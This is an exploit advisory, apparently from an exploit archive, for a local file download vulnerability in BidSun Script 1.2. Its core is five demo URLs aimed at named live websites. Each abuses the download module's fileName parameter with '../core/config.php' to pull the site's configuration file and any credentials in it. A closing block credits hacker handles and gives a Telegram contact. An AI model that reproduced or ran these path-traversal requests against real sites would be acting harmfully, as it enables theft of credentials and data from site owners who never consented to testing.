/***********************************************************************************
** Exploit Title: BidSun Script Local File Download Vulnerability
**
** Exploit Author: FullSecurity.org
**
** Discovered By: Milad Hacking
**
** Vendor Homepage : http://bidsun.ir/
**
** Demo Script Link: http://bidsun.ir/demo/
**
** Version : 1.2
**
** Date: 2016-01-13
**
** Tested on: Kali Linux / lceweasel
**
***********************************************************************************
** Demo :
http://knownsunknowns.com/index.php?mod=download&met=downFile&fileName=../core/config.php
http://boloorbook.com/index.php?mod=download&met=downFile&fileName=../core/config.php
http://arman.rahimzadeh.ir/index.php?mod=download&met=downFile&fileName=../core/config.php
http://www.waresin.ir/index.php?mod=download&met=downFile&fileName=../core/config.php
http://www.touristban.com/index.php?mod=download&met=downFile&fileName=../core/config.php
***********************************************************************************
** Special thanks to: iliya Norton - Milad Hacking - Mohamad Ghasemi
- irhblackhat - distr0watch - N3TC4T - Mohamad Nofozi - Mr.G}{o$t -
s4livan - MRS4JJ4D - SeCrEt_HaCkEr - Xodiak Blackhat - Shadow_Walker
<3
***********************************************************************************
https://telegram.me/thehacking
http://FullSecurity.org
milad.hacking.blackhat@Gmail.com
***********************************************************************************
